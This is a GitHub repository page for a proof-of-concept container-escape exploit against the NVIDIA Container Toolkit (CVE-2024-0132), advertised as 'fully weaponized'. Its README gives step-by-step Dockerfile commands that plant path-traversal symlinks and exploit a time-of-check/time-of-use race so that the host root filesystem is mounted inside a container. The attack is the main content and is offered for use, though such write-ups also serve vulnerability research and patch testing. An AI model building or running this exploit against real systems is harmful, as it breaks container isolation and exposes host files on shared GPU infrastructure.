Skip to content
/ CVE-2024-0132 Public

CVE-2024-0132 – Fully Weaponized NVIDIA Container Toolkit Exploit

5 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

r0binak/CVE-2024-0132

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2024-0132

CVE-2024-0132 PoC

Let's start by deciding on a base image. The arrangement of libraries in the system depends on what it will be. For example, for alpine it will be /usr/lib64/, for ubuntu it will be /usr/lib/x86_64-linux-gnu. We will use ubuntu as a base image.

FROM ubuntu

The nvidia containter toolkit checks the libraries in /usr/local/cuda/compat/ inside the container and then mounts them in the main library directory, for this image (ubuntu) this would be /usr/lib/x86_64-linux-gnu.

Links are also mounted, so you can mount any file and directory from the image to /usr/lib/x86_64-linux-gnu. This checks that the link is resolved inside the container, it cannot use multiple ../ for path traversal. However, this can be circumvented by using the in-container mount via /usr/local/cuda/compat/ twice, hence TOCTOU.

Read more about the mechanism for mounting from /usr/local/cuda/compat/:

RUN mkdir -p /usr/local/cuda/compat/

Create two directories:

  1. The original directory will contain a regular file with the contents of test
RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
  1. The second directory with the same name will contain a link with path traversal instead of a file.
RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs

The name libdxcore.so is chosen to satisfy filters. The major version (1337) must be different from the real driver version.

Create two links in /usr/local/cuda/compat/:

  1. The first link will substitute the contents of the original directory /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/ for /pwn/libdxcore.so.1337/
RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1
  1. The second link mount /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs to /usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs. During the check it will be a normal file, but at the moment of the mount it will be a link that was in /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs, thus the host filesystem will be mounted in /usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/.
RUN ln -s /usr/lib64/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2

About

CVE-2024-0132 – Fully Weaponized NVIDIA Container Toolkit Exploit

Topics

exploit nvidia-container-toolkit container-breakout nvidia-gpu-operator cve-2024-0132

Resources

Readme
Activity

Stars

5 stars

Watchers

1 watching

Forks

0 forks
Report repository

Languages